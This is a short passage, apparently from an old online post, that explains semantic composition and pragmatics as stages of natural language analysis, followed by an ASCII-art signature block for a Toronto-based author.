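combined with its object to give the verb phrase, and the verb phrase is
then applied to the subject.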

Pragmatics is the last stage of analysis, where the meaning is elaborated
based on contextual and world knowledge. Contextual knowledge includes
knowledge of the previous sentences (spoken or written), general knowledge
about the world, and knowledge of the speaker.

.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
_____________
,o888b,`?88 Sol B. Descartes @ ZENCOR Technologics \ _ _ _ /
,8888 888 ?8 s...@psynet.net \ \ | / /
8888888P' 8 http://www.psynet.net/sol \ \|/ /
888P' 8 #ZENCOR \ | /
`88 O d8 Toronto, Ontario, Canada \ | /
`?._ _.o88 ZEN-CON Sundays @ Cafe.ORG \_/

.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
